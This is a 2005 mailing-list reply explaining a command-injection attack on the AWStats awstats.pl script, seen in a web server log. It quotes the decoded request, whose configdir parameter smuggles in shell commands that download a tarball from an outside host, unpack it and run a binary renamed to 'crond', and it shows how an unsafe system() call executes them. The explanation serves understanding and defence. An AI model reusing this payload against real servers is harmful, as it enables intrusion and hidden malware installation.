On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
It is enough if the script does something as stupid as:
system("cat $configdir/somefile")(Assuming value of configdir is stored in $configdir variable).
What gets executed is:
cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile
The last part will produce an error, most likely, but who cares, the important part was already executed...
It is classic example of command injection. Most of exploits of that type are for SQL queries. This one is for shell.
-- Aleksandar Milivojevic <amilivojevic@xxxxxx> Pollard Banknote Limited Systems Administrator 1499 Buffalo Place Tel: (204) 474-2323 ext 276 Winnipeg, MB R3T 1L7
